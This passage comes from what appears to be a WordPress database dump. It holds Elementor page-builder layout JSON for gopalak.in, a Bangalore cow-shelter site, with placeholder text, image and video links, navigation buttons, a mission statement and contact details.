here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5913281\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f899190\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"8a4dc1c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5270078\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ac0016\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"9200df5\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=XHOmBV4js_E\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=XHOmBV4js_E\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-220,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/strong><\\/h4>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9059,1552,'_elementor_page_assets','a:0:{}'),(9061,1553,'_elementor_edit_mode','builder'),(9062,1553,'_elementor_template_type','wp-page'),(9063,1553,'_elementor_version','3.7.8'),(9064,1553,'_wp_page_template','elementor_canvas'),(9065,1553,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Group-122.png\",\"id\":1543,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thaps-thumb-img\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":32.792000000000002},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":9.5269999999999992},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":6.8070000000000004},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":10.93},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":12.159000000000001},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":12.058999999999999},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\",\"id\":1544,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}],\"background_repeat\":\"no-repeat\"},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":8.9529999999999994},\"elements\":[],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":91,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"title_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.<\\/p>\",\"text_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"623a672\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":976,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"739cf25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d837b3b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#3AB2A7\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"4b8356a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4cb627c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"fafaf1c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#092220\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"0775f80\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5913281\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f899190\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"8a4dc1c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5270078\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ac0016\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"9200df5\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=XHOmBV4js_E\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=XHOmBV4js_E\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\